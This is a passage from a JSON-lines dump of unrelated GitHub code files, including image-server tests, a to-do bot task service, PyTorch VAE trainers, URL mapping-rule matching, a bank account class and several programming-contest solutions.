print(e)\n print(os.path.exists(filepath))\n if not os.path.exists(filepath):\n # os.mkdir(path)\n image_path = f\"/tmp/images/{filename}\"\n pims_root = root\n importer_path = 
f\"/app/pims/importer/import_local_images.py\" # pims folder should be in root folder\n import_img = subprocess.run(\n [\"python3\", importer_path, \"--path\", image_path], stdout=subprocess.PIPE\n )\n\n subdirs = os.listdir(pims_root)\n for subdir in subdirs:\n if \"upload-\" in str(subdir):\n subsubdirs = os.listdir(os.path.join(root, subdir))\n for subsubdir in subsubdirs:\n if filename in str(subsubdir):\n upload_dir = os.path.join(root, str(subdir))\n break\n if os.path.exists(path):\n os.unlink(path)\n\n print(path, root)\n print(os.path.exists(upload_dir)) # existe\n print(os.path.exists(path)) # n'existe pas\n print(os.path.exists(root)) # existe\n os.symlink(upload_dir, path)\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_exists(image_path_excentric_filename, root):\n path, filename = image_path_excentric_filename\n get_image(path, filename, root)\n assert os.path.exists(os.path.join(path, filename)) == True\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_info(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n response = client.get(f\"/image/upload_test_excentric/{filename}/info\")\n assert response.status_code == 200\n assert \"tiff\" in response.json()[\"image\"][\"original_format\"].lower()\n\n assert response.json()[\"image\"][\"width\"] == 46000\n assert response.json()[\"image\"][\"height\"] == 32914\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_norm_tile(client, image_path_excentric_filename):\n path, filename = image_path_excentric_filename\n response = client.get(\n f\"/image/upload_test_excentric/{filename}/normalized-tile/zoom/1/ti/0\",\n headers={\"accept\": \"image/jpeg\"},\n )\n assert response.status_code == 200\n\n img_response = Image.open(io.BytesIO(response.content))\n width_resp, height_resp = img_response.size\n\n assert width_resp == 256\n assert height_resp == 256\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_thumb(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n thumb_test(client, filename, \"excentric\")\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_resized(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n resized_test(client, filename, \"excentric\")\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_mask(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n mask_test(client, filename, \"excentric\")\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_crop(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n crop_test(client, filename, \"excentric\")\n\n@pytest.mark.skip(reason=\"Does not return the correct response code\")\ndef test_crop_null_annot(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n crop_null_annot_test(client, filename, \"excentric\")\n\n# TODO investigate\n@pytest.mark.skip(reason=\"currently failing without apparent reason\")\ndef test_histogram_perimage(client, image_path_excentric_filename):\n _, filename = image_path_excentric_filename\n histogram_perimage_test(client, filename, 
\"excentric\")\n","repo_name":"Cytomine-ULiege/pims","sub_path":"tests/test_excentric_filename.py","file_name":"test_excentric_filename.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38984974337","text":"import calendar\nfrom datetime import datetime, timedelta\nfrom typing import List, Optional\nfrom utils.misc.logging import logger\nfrom models import User\nfrom models.task import Task\nfrom loader import _\nfrom dateutil.relativedelta import relativedelta\nfrom peewee import DoesNotExist\n\n\ndef get_tasks(user_id: int) -> List[Task]:\n return Task.select().where(Task.author == user_id)\n\n\ndef get_to_do(user_id: int) -> List[Task]:\n tasks = get_tasks(user_id)\n return [task for task in tasks if not task.is_done]\n\n\ndef get_completed(user_id: int) -> List[Task]:\n tasks = get_tasks(user_id)\n return [task for task in tasks if task.is_done]\n\n\ndef create_task(user_id: int, task_name: str, task_date: datetime, task_time: datetime, periodicity: str, attachments: str):\n user = User.get(User.id == user_id)\n new_task = Task.create(author=user, text=task_name, date=task_date, time=task_time, periodicity=periodicity, attachments=attachments)\n new_task.save()\n return new_task.id\n\n\ndef get_task_by_id(id: int) -> Optional[Task]:\n task = Task.get_or_none(Task.id == id)\n if task is None:\n logger.exception(f'No task found with id {id}')\n # raise ValueError(_(f\"No task found with id {id}\"))\n \n return task\n\n\ndef get_task_by_date(time: str) -> List[Task]:\n return Task.select().where((Task.time == time) & (Task.is_done == False))\n\n\ndef change_is_done(id: int) -> None:\n task = get_task_by_id(id)\n is_done = task.is_done\n if task.periodicity == 'no':\n task.is_done = not is_done\n else:\n try:\n # parse the number of days from the periodicity string\n days = int(task.periodicity.split()[0])\n\n # add the remaining days to the end of the month\n remaining_days = calendar.monthrange(task.date.year, task.date.month)[1] - task.date.day\n if remaining_days < days:\n task.date += timedelta(days=remaining_days)\n days -= remaining_days\n else:\n task.date += timedelta(days=days)\n days = 0\n\n # add the remaining days to the end of each month\n while days > 0:\n # calculate the number of days in the next month\n next_month = task.date.replace(day=1) + relativedelta(months=1)\n days_in_month = (next_month - timedelta(days=1)).day\n\n # add the remaining days to the end of the month\n if days_in_month <= days:\n task.date = next_month\n days -= days_in_month\n else:\n task.date = next_month.replace(day=days)\n days = 0\n except ValueError as e:\n logger.exception(f\"Invalid periodicity format: {task.periodicity}\")\n return\n task.done_date = datetime.now() if task.is_done else None\n task.save()\n\n\ndef add_days_to_date(date: datetime, days: int) -> datetime:\n days_in_month = (date.replace(day=1) + timedelta(days=32)).day - 1\n days_left = days_in_month - date.day + 1\n if days <= days_left:\n return date + timedelta(days=days)\n else:\n next_month = date.replace(day=1) + timedelta(days=32)\n days_to_add = days - days_left\n return next_month.replace(day=1) + timedelta(days=days_to_add - 1)\n\n\ndef delete_by_id(id: int) -> None:\n task = get_task_by_id(id)\n task.delete_instance()\n\n\nasync def update_task(id: int, text: Optional[str] = None, date: Optional[datetime] = None,\n time: Optional[datetime] = None, periodicity: Optional[str] = None) -> bool:\n task = 
get_task_by_id(id)\n if task is None:\n return False\n if text is not None:\n task.text = text\n if date is not None:\n task.date = date.date()\n if time is not None:\n task.time = time.time()\n if periodicity is not None:\n task.periodicity = periodicity\n task.save()\n return True\n\n\ndef delete_all_tasks(user_id: int, param: str) -> None:\n tasks = Task.select().where(Task.author == user_id)\n if param == 'to-do':\n tasks_del = tasks.where(Task.is_done == False)\n elif param == 'completed':\n tasks_del = tasks.where(Task.is_done == True)\n else:\n logger.exception(f'Invalid parameter.')\n return\n deleted_count = 0\n for task in tasks_del:\n task.delete_instance()\n deleted_count += 1\n if deleted_count == 0:\n logger.exception(f'No tasks to delete.')\n else:\n logger.exception(f'{deleted_count} tasks have been deleted.')\n\n\ndef add_attachment_by_id(task_id: int, attachment: str):\n task = Task.get_or_none(Task.id == task_id)\n if task is None:\n logger.exception(f\"No Task found with id {task_id}\")\n \n new_attachments = task.attachments + \";\" + attachment\n task.attachments = new_attachments\n task.save()\n\n\ndef delete_attachments_by_id(task_id: int, indices: List[int]) -> int:\n try:\n task = Task.get_by_id(task_id)\n except DoesNotExist:\n return -1\n \n attachments = task.attachments.split(';')\n attachments.pop(-1)\n \n for index in indices:\n if index < 0 or index >= len(attachments):\n return -1\n \n new_attachments = [att for idx, att in enumerate(attachments) if idx not in indices]\n new_attachments_str = ';'.join(new_attachments) + ';'\n \n task.attachments = new_attachments_str\n task.save()\n \n return 0","repo_name":"IMZolin/Todolist-Telegram-bot","sub_path":"services/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23217811026","text":"from itertools import permutations\nfrom math import floor, sqrt\nimport sys\n\n\nread = sys.stdin.readline\n\nyumi = tuple(map(int, read().split()))\npeople = [tuple(map(int, read().split())) for _ in range(3)]\n\nmin_distance = 1e9\nfor p in permutations(people):\n distance = sqrt((yumi[0]-p[0][0])**2\n + (yumi[1]-p[0][1])**2)\n for i in range(2):\n distance += sqrt((p[i][0]-p[i+1][0])**2\n + (p[i][1]-p[i+1][1])**2)\n \n min_distance = min(min_distance, distance)\n \nprint(floor(min_distance))\n","repo_name":"mozzieongit/Bike-Project","sub_path":"boj/prob17286.py","file_name":"prob17286.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2418513031","text":"from unittest import TestCase\nfrom leetcode.WordsReverse import *\n\n__author__ = 'mywo'\n\n\nclass TestSolution(TestCase):\n def test_reverseWords(self):\n solution = Solution()\n self.assertEqual(\"blue is sky the\", solution.reverseWords(\"the sky is blue\"))\n","repo_name":"alex-1q84/leetcode","sub_path":"python/test/test_WordsReverse.py","file_name":"test_WordsReverse.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71458428967","text":"from inheritemp import Employee\r\nclass Programmer(Employee):\r\n def __init__(self,eid=0,ename=None,basic=0,extrahrs=0,perhr=0):\r\n super().__init__(eid,ename,basic)\r\n self.extrahrs=extrahrs\r\n self.perhr=perhr\r\n def display(self):\r\n 
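# print a banner, the shared Employee fields via super().display(), then the programmer-specific ones\r\n        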
print(\"-----------PROGRAMMER-----------------------------------\")\r\n super().display() \r\n print(\"PROGRAMMER PER HOURS :\",self.perhr)\r\n print(\"PROGRAMMER EXTRA HOURS :\",self.extrahrs)\r\n print(\"-----------PROGRAMMER END--------------------------------\")\r\n#p1=Programmer(102,\"RAHUL\",34689,5,3456)\r\n#p1.display() \r\n\r\n\r\n","repo_name":"affankhan21/python","sub_path":"inheritprogrammer.py","file_name":"inheritprogrammer.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7493816767","text":"import torch\nfrom gem.models.base import Trainer\nfrom itertools import chain\nfrom tabulate import tabulate\n\nfrom gem.utils import nats2bits\n\nclass VAETrainer(Trainer):\n def __init__(self, sensor, train_loader, val_loader=None, test_loader=None, config={}):\n super().__init__(train_loader, val_loader=val_loader, test_loader=test_loader, config=config)\n\n self.sensor = sensor\n self.sensor = self.sensor.to(self.device)\n\n # config optimizer\n self.optim = torch.optim.Adam(self.sensor.parameters(), lr=self.config['m_lr'], \n betas=(self.config['m_beta1'], self.config['m_beta2']))\n\n def parse_batch(self, batch):\n batch = batch[0].to(self.device)\n if len(batch.shape) == 5:\n batch = batch.view(-1, *batch.shape[2:]) \n return batch \n\n def train_step(self):\n batch = self.parse_batch(next(self.train_iter))\n\n loss, info = self.sensor(batch)\n\n self.optim.zero_grad()\n loss.backward()\n grad_norm = torch.nn.utils.clip_grad_norm_(self.sensor.parameters(), self.config['m_grad_clip'])\n self.optim.step()\n info.update({\"sensor_grad_norm\" : grad_norm})\n\n self.last_train_info = info\n\n def log_step(self, step):\n val_loss, val_info = self.test_whole(self.val_loader)\n\n print('In Step {}'.format(step))\n print('-' * 15)\n print('In training set:')\n print(tabulate(self.last_train_info.items(), numalign=\"right\"))\n print('In validation set:')\n print(tabulate(val_info.items(), numalign=\"right\"))\n\n for k in val_info.keys():\n self.writer.add_scalars('sensor/' + k, {'train' : self.last_train_info[k], \n 'val' : val_info[k]}, global_step=step)\n self.writer.add_scalar('sensor/grad_norm', self.last_train_info['sensor_grad_norm'], global_step=step)\n \n with torch.no_grad():\n imgs = torch.clamp(self.sensor.sample(64) + 0.5, 0, 1)\n self.writer.add_images('samples', imgs, global_step=step)\n batch = self.parse_batch(next(self.train_iter))\n input_imgs = batch[:32]\n reconstructions = torch.clamp(self.sensor.decode(self.sensor.encode(input_imgs)) + 0.5, 0, 1)\n inputs_and_reconstructions = torch.stack([input_imgs + 0.5, reconstructions], dim=1).view(input_imgs.shape[0] * 2, *input_imgs.shape[1:])\n self.writer.add_images('inputs_and_reconstructions', inputs_and_reconstructions, global_step=step)\n \n def test_whole(self, loader):\n with torch.no_grad():\n num = 0\n info = {}\n loss = 0\n for batch in iter(loader):\n num += 1\n batch = self.parse_batch(batch)\n _loss, _info = self.sensor(batch)\n loss += _loss\n for k in _info.keys():\n info[k] = info.get(k, 0) + _info[k]\n loss = loss / num\n for k in info.keys():\n info[k] = info[k] / num\n\n return loss.item(), info\n\n def save(self, filename):\n test_loss, test_info = self.test_whole(self.test_loader)\n torch.save({\n \"sensor_state_dict\" : self.sensor.state_dict(),\n \"optimizer_state_dict\" : self.optim.state_dict(),\n \"test_info\" : test_info,\n \"config\" : self.config,\n \"sensor_parameters\" : 
self.config['sensor_param'],\n \"seed\" : self.config['seed'],\n }, filename)\n\n def restore(self, checkpoint):\n self.sensor.load_state_dict(checkpoint['sensor_state_dict'])\n self.sensor = self.sensor.to(self.device) # make sure model on right device\n self.optim.load_state_dict(checkpoint['optimizer_state_dict'])\n\nclass AVAETrainer(Trainer): # NOTE: this is broken now!\n def __init__(self, model, train_loader, val_loader=None, test_loader=None, config={}):\n super().__init__(model, train_loader, val_loader=val_loader, test_loader=test_loader, config=config)\n\n # config optimizor\n self.discriminator_optim = torch.optim.Adam(model.discriminator.parameters(), \n lr=config['lr'], betas=(config['beta1'], config['beta2']))\n self.coder_optim = torch.optim.Adam(chain(model.encoder.parameters(), model.decoder.parameters()), \n lr=config['lr'], betas=(config['beta1'], config['beta2']))\n\n def parse_batch(self, batch):\n batch = batch[0].to(self.device)\n if len(batch.shape) == 5:\n batch = batch.view(-1, *batch.shape[2:]) \n return batch \n\n def train_step(self):\n for i in range(self.config['n_critic']):\n real = self.parse_batch(next(self.train_iter))\n\n loss, mask, info = self.model(real)\n discriminator_loss = -loss\n\n self.discriminator_optim.zero_grad()\n discriminator_loss.backward()\n self.discriminator_optim.step()\n\n # train generator only once\n real = self.parse_batch(next(self.train_iter))\n generator_loss, mask, info = self.model(real)\n\n self.coder_optim.zero_grad()\n generator_loss.backward()\n self.coder_optim.step()\n\n self.last_discriminator_loss = discriminator_loss.item()\n self.last_train_loss = generator_loss.item()\n self.last_train_info = info\n self.last_mask = mask.detach()\n\n def log_step(self, step):\n val_loss, val_info = self.test_whole(self.val_loader)\n print('In Step {}'.format(step))\n print('-' * 15)\n print('In training set:')\n print('NELBO is {0:{1}} bits'.format(nats2bits(self.last_train_loss), '.2f'))\n print('D loss is {0:{1}} bits'.format(nats2bits(self.last_discriminator_loss), '.2f'))\n for k in self.last_train_info.keys():\n print('{0} is {1:{2}} bits'.format(k, nats2bits(self.last_train_info[k]), '.2f'))\n print('In validation set:')\n print('NELBO is {0:{1}} bits'.format(nats2bits(val_loss), '.2f'))\n for k in val_info.keys():\n print('{0} is {1:{2}} bits'.format(k, nats2bits(val_info[k]), '.2f'))\n\n self.writer.add_scalars('NELBO', {'train' : nats2bits(self.last_train_loss), \n 'val' : nats2bits(val_loss)}, global_step=step)\n for k in self.last_train_info.keys():\n self.writer.add_scalars(k, {'train' : nats2bits(self.last_train_info[k]), \n 'val' : nats2bits(val_info[k])}, global_step=step)\n \n with torch.no_grad():\n imgs = torch.clamp(self.model.sample(64), 0, 1)\n self.writer.add_images('samples', imgs, global_step=step)\n batch = self.parse_batch(next(self.train_iter))\n input_imgs = batch[:32]\n reconstructions = torch.clamp(self.model.decode(self.model.encode(input_imgs)), 0, 1)\n inputs_and_reconstructions = torch.stack([input_imgs, reconstructions], dim=1).view(input_imgs.shape[0] * 2, *input_imgs.shape[1:])\n self.writer.add_images('inputs_and_reconstructions', inputs_and_reconstructions, global_step=step)\n mask_max = torch.max(torch.max(self.last_mask, dim=2, keepdim=True)[0], dim=3, keepdim=True)[0]\n self.writer.add_images('mask', self.last_mask / mask_max, global_step=step)\n\n def test_whole(self, loader):\n with torch.no_grad():\n num = 0\n info = {}\n loss = 0\n for batch in iter(loader):\n num += 1\n batch = 
self.parse_batch(batch)\n                _loss, _mask, _info = self.model(batch)\n                loss += _loss\n                for k in _info.keys():\n                    info[k] = info.get(k, 0) + _info[k]\n            loss = loss / num\n            for k in info.keys():\n                info[k] = info[k] / num\n\n        return loss.item(), info\n\n    def save(self, filename):\n        torch.save({\n            \"model_state_dict\" : self.model.state_dict(),\n            \"discriminator_optimizer_state_dict\" : self.discriminator_optim.state_dict(),\n            \"coder_optimizer_state_dict\" : self.coder_optim.state_dict(),\n            \"config\" : self.config,\n            \"model_parameters\" : self.config['model_param'],\n            \"seed\" : self.config['seed'],\n        }, filename)\n\n    def restore(self, filename):\n        checkpoint = torch.load(filename, map_location='cpu')\n        self.model.load_state_dict(checkpoint['model_state_dict'])\n        self.model = self.model.to(self.device) # make sure model on right device\n        self.discriminator_optim.load_state_dict(checkpoint['discriminator_optimizer_state_dict'])\n        self.coder_optim.load_state_dict(checkpoint['coder_optimizer_state_dict'])\n\n","repo_name":"IcarusWizard/GEM","sub_path":"gem/models/sensor/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":8818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"7047917057","text":"import time\n\nclass BankAccount(object):\n    def __init__(self, label, balance):\n        self.label = label\n        self.balance = balance\n\n    def __str__(self):\n        return \"Label: {label}\\nBalance:{bal}\".format(\n            label = self.label, bal = self.balance)\n    def withdraw(self, amount):\n        if(amount > self.balance):\n            print(\"Sorry, you require $\" + str(amount-self.balance) + \" in order to withdraw\")\n            return\n        elif(amount < 0):\n            print(\"Sorry, that is an invalid amount.\")\n        else:\n            self.balance -= amount\n            print(\"Transaction Successful! You have ${bal} remaining in your account.\".format(bal = self.balance))\n            return\n\n    def deposit(self, amount):\n        if(amount < 0):\n            print(\"Sorry, that is an invalid amount.\")\n            return\n        else:\n            self.balance += amount\n            print(\"Transaction Successful! 
You have ${bal} remaining in your account.\".format(bal = self.balance))\n\n    def rename(self, new_label):\n        if(new_label == \"\"):\n            print(\"Please provide a valid label.\")\n            return\n        self.label = new_label\n        print(\"Label successfully changed!\")\n        return\n\n    def transfer(self, dest_account, amount):\n        if(amount < 0 or amount > self.balance):\n            print(\"Sorry, invalid transfer.\")\n            return\n        self.balance -= amount\n        dest_account.deposit(amount)\n        print(\"Transfer successful!\")\n        return\n\nclass Transaction(object):\n    def __init__(self, time, type, amount, dest_account=None):\n        self.time = time\n        self.type = type\n        self.amount = amount\n        self.dest_account = dest_account\n","repo_name":"TrippleCCC/DANK_CSSI_STUFFS","sub_path":"python/labs/quick-banking-app/starter-code/banking.py","file_name":"banking.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"39010394729","text":"from pydantic import AnyHttpUrl\nfrom starlette.datastructures import QueryParams\n\nfrom horizon.enforcer.schemas import MappingRuleData\n\n\nclass MappingRulesUtils:\n    @staticmethod\n    def _compare_urls(mapping_rule_url: AnyHttpUrl, request_url: AnyHttpUrl) -> bool:\n        if mapping_rule_url.scheme != request_url.scheme:\n            return False\n        if mapping_rule_url.host != request_url.host:\n            return False\n        if not MappingRulesUtils._compare_url_path(\n            mapping_rule_url.path, request_url.path\n        ):\n            return False\n        if not MappingRulesUtils._compare_query_params(\n            mapping_rule_url.query, request_url.query\n        ):\n            return False\n        return True\n\n    @staticmethod\n    def _compare_url_path(\n        mapping_rule_url: str | None, request_url: str | None\n    ) -> bool:\n        if mapping_rule_url is None and request_url is None:\n            return True\n        if not (mapping_rule_url is not None and request_url is not None):\n            return False\n        mapping_rule_url_parts = mapping_rule_url.split(\"/\")\n        request_url_parts = request_url.split(\"/\")\n        if len(mapping_rule_url_parts) != len(request_url_parts):\n            return False\n        for i in range(len(mapping_rule_url_parts)):\n            if mapping_rule_url_parts[i].startswith(\"{\") and mapping_rule_url_parts[\n                i\n            ].endswith(\"}\"):\n                continue\n            if mapping_rule_url_parts[i] != request_url_parts[i]:\n                return False\n        return True\n\n    @staticmethod\n    def _compare_query_params(\n        mapping_rule_query_string: str | None, request_url_query_string: str | None\n    ) -> bool:\n        if mapping_rule_query_string is None and request_url_query_string is None:\n            # if both are None, they are equal\n            return True\n        if mapping_rule_query_string is not None and request_url_query_string is None:\n            # if the request query string is None, but the mapping rule query string is not\n            # then the request does not match the mapping rule\n            return False\n        if mapping_rule_query_string is None and request_url_query_string is not None:\n            # if the mapping rule query string is None, but the request query string is not\n            # then the request matches the rule's query string constraints; it just carries additional data\n            return True\n\n        mapping_rule_query_params = QueryParams(mapping_rule_query_string)\n        request_query_params = QueryParams(request_url_query_string)\n\n        for key in mapping_rule_query_params.keys():\n            if key not in request_query_params:\n                return False\n\n            if mapping_rule_query_params[key].startswith(\n                \"{\"\n            ) and mapping_rule_query_params[key].endswith(\"}\"):\n                # if the value is an attribute\n                # we just need to make sure the attribute is in the request query params\n                continue\n            elif 
mapping_rule_query_params[key] != request_query_params[key]:\n                # if the value is not an attribute, verify that the values are the same\n                return False\n        return True\n\n    @staticmethod\n    def extract_attributes_from_url(rule_url: str, request_url: str) -> dict:\n        rule_url_parts = rule_url.split(\"/\")\n        request_url_parts = request_url.split(\"/\")\n        attributes = {}\n        if len(rule_url_parts) != len(request_url_parts):\n            return {}\n        for i in range(len(rule_url_parts)):\n            if rule_url_parts[i].startswith(\"{\") and rule_url_parts[i].endswith(\"}\"):\n                attributes[rule_url_parts[i][1:-1]] = request_url_parts[i]\n        return attributes\n\n    @staticmethod\n    def extract_attributes_from_query_params(rule_url: str, request_url: str) -> dict:\n        if \"?\" not in rule_url or \"?\" not in request_url:\n            return {}\n        rule_query_params = QueryParams(rule_url.split(\"?\")[1])\n        request_query_params = QueryParams(request_url.split(\"?\")[1])\n        attributes = {}\n        for key in rule_query_params.keys():\n            if rule_query_params[key].startswith(\"{\") and rule_query_params[\n                key\n            ].endswith(\"}\"):\n                attributes[rule_query_params[key][1:-1]] = request_query_params[key]\n        return attributes\n\n    @classmethod\n    def extract_mapping_rule_by_request(\n        cls,\n        mapping_rules: list[MappingRuleData],\n        http_method: str,\n        url: AnyHttpUrl,\n    ) -> MappingRuleData | None:\n        matched_mapping_rules = []\n        for mapping_rule in mapping_rules:\n            if not mapping_rule.http_method == http_method.lower():\n                # if the method is not the same, we don't need to check the url\n                continue\n            if not cls._compare_urls(mapping_rule.url, url):\n                # if the URLs don't match, skip this rule\n                continue\n            matched_mapping_rules.append(mapping_rule)\n        # highest priority first\n        matched_mapping_rules.sort(key=lambda rule: rule.priority or 0, reverse=True)\n        if len(matched_mapping_rules) > 0:\n            return matched_mapping_rules[0]\n\n        return None\n","repo_name":"permitio/sidecar","sub_path":"horizon/enforcer/utils/mapping_rules_utils.py","file_name":"mapping_rules_utils.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"27825659977","text":"import math\nimport multiprocessing\nimport random\nimport warnings\nfrom argparse import ArgumentParser\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List, Tuple, Any\n\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom sty import fg\nfrom common import get_config, format_time_difference, load_file, clean_dataset, create_classifiers\n\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n\ndef calculate_auc(df: pd.DataFrame, classifier, k_fold: KFold, original_class: pd.DataFrame) -> Tuple[Any, float]:\n    aucs = []\n    for train_index, test_index in k_fold.split(df, original_class):\n        training_set, test_set = df.iloc[train_index], df.iloc[test_index]\n        training_class, test_class = original_class.iloc[train_index], original_class.iloc[test_index]\n        if hasattr(classifier, \"predict_proba\"):\n            predicted = classifier.fit(training_set, training_class).predict_proba(test_set)[:, 1]\n        else:\n            prob_pos = classifier.fit(training_set, training_class).decision_function(test_set)\n            predicted = \\\n                (prob_pos - prob_pos.min()) / (prob_pos.max() - prob_pos.min())\n        fpr, tpr, _ = metrics.roc_curve(test_class, predicted)\n        auc = metrics.auc(fpr, tpr)\n        aucs.append(auc)\n    
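# The classifier's score is the mean AUC over the k folds.\n    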
return classifier, sum(aucs) / k_fold.n_splits\n\n\ndef get_best_classifier(df: pd.DataFrame, classifiers: List, seed: int, pool: multiprocessing.Pool) -> Tuple[Any, float]:\n    kf = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\n    original_class = df['class']\n    df = df.drop(columns='class')\n    results = pool.starmap(calculate_auc, [(df, classifier, kf, original_class) for classifier in classifiers])\n    results.sort(key=lambda x: x[1], reverse=True)\n\n    return results[0]\n\n\ndef obtain_best_classifier_in_folder(directory: Path, seed: int) -> List[Tuple[Any, float, Path]]:\n    procs = get_config(\"INIT\", \"procs\")\n    if procs.isspace() or not procs.isnumeric():\n        procs = math.floor(multiprocessing.cpu_count() / 2)\n    else:\n        procs = int(procs)\n\n    pool = multiprocessing.Pool(procs)\n    files = [x for x in directory.iterdir() if x.suffix == \".csv\"]\n    classifiers = create_classifiers()\n    result = []\n    for file in files:\n        df = load_file(file)\n        df = clean_dataset(df)\n        start = datetime.now()\n        classifier, auc = get_best_classifier(df, classifiers, seed, pool)\n        end = datetime.now()\n        result.append((classifier, auc, file))\n        print(\n            f\"Finished file {fg.blue}{file}{fg.rs}, took {format_time_difference(start.timestamp(), end.timestamp())}\")\n    pool.close()\n    return result\n\n\ndef multiple_analysis(num_of_seeds):\n    directory = Path(\"Data/Partitions\").resolve()\n    seeds = [random.randint(1, 10000000) for _ in range(num_of_seeds)]\n    total_results = pd.DataFrame()\n    for seed in seeds:\n        results = obtain_best_classifier_in_folder(directory, seed)\n        idx = [x[2].stem for x in results]\n        data = [x[1] for x in results]\n        series = pd.Series(name=f\"{seed}\", data=data, index=idx)\n        total_results = total_results.append(series)\n    print(total_results)\n    total_results.to_csv(\"Data/vic_results.csv\")\n    print(total_results.mean())\n    print(total_results.mean().sort_values())\n\n\ndef main():\n    parser = ArgumentParser()\n    parser.add_argument(\"-d\", \"--directory\", required=True, help=\"Directory to be analyzed\")\n    parser.add_argument(\"-s\", \"--seed\", required=False, help=\"Seed to be used, must be numeric\", type=int)\n    args = parser.parse_args()\n\n    directory = Path(args.directory).resolve()\n    if not args.seed:\n        seed = get_config(\"INIT\", \"seed\")\n        if seed.isspace() or not seed.isnumeric():\n            seed = 1\n        else:\n            seed = int(seed)\n    else:\n        seed = args.seed\n\n    start = datetime.now()\n    results = obtain_best_classifier_in_folder(directory, seed)\n    end = datetime.now()\n    print(f\"Analysis of all files took {format_time_difference(start.timestamp(), end.timestamp())}\")\n    for classifier, auc, file in results:\n        print(f\"File {file.name} best classifier is {type(classifier).__name__} with auc {auc}\")\n\n    rs = len(results)\n    results = [x for x in results if not math.isnan(x[1])]\n    print(f\"Removed {rs - len(results)} that have nan\")\n\n    results.sort(key=lambda x: x[1], reverse=True)\n\n    print(f\"{fg.blue}The best 5 splits are:{fg.rs}\")\n    for _, auc, file in results[:5]:\n        print(f\"- {fg.green}{file}{fg.rs} with auc {fg.green}{auc}{fg.rs}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"edjacob25/Vic","sub_path":"vic.py","file_name":"vic.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"17454924428","text":"# Baekjoon - https://www.acmicpc.net/problem/5636\nimport math\nimport sys\n# prime number check function\ndef is_prime_number(x):\n    # check every number from 2 up to the square root of x\n    for i in range(2, int(math.sqrt(x)) + 1):\n        
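# trial division: any composite x has a divisor no greater than sqrt(x)\n        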
# if x is divisible by that number\n        if x % i == 0:\n            return False # not a prime\n    return True # prime\n\nfor line in sys.stdin:\n    line = line.rstrip()\n    max_prime_number = 0\n    if line == \"0\":\n        break\n    for i in range(1,len(line)+1):\n        start = 0\n        while (start+i<len(line)+1):\n            num = int(line[start:start+i])\n            if is_prime_number(num) and max_prime_number<num and 2<= num <100000:\n                max_prime_number = num\n            start+=1\n    print(max_prime_number)\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열(nomal)문제모음/소수_부분_문자열.py","file_name":"소수_부분_문자열.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"24738408777","text":"from collections import namedtuple\nimport numpy as np\nnp.set_printoptions(precision=2)\nimport sys\n\nfrom time import time\n\nfrom functools import partial\n\nimport pygame\nfrom Agent import A_star_agent, D_star_agent, MapStatus, scan_8_grid, scan_circular\nfrom Grid import Grid, GridStatus\n\nOffset = namedtuple(\"Offset\", [\"top\", \"bottom\", \"left\", \"right\"])\n\nclass Simulation(object):\n    def __init__(self, render=False, window_size=None, FPS=None, render_offset=(0,0,0,0), center_col_width=0) -> None:\n        self.agent = None\n        self.grid = None\n        self.render = render\n        self.window_size = window_size\n        self.FPS = FPS\n        self.render_offset = render_offset # (top,bottom,left,right)\n        self.center_col_width = center_col_width\n\n        if render and (window_size is None or FPS is None):\n            print(\"Render set to True, but no render parameters given.\")\n            sys.exit()\n        if render:\n            import pygame\n            pygame.init()\n            self.clock = pygame.time.Clock()\n            self.screen = pygame.display.set_mode(window_size)\n            self.color_dict = {\"black\": (0,0,0), \n                               \"red\": (255,0,0), \n                               \"white\": (255,255,255), \n                               \"gray\": (128,128,128),\n                               \"blue\": (0,0,255),\n                               \"purple\": (128,0,128),\n                               \"green\": (0,255,0),\n                               \"yellow\": (255,255,0),\n                               \"brown\": (205,133,63),\n                               \"turquoise\": (100,200,255),\n                               }\n\n    def init_grid(self, grid_size) 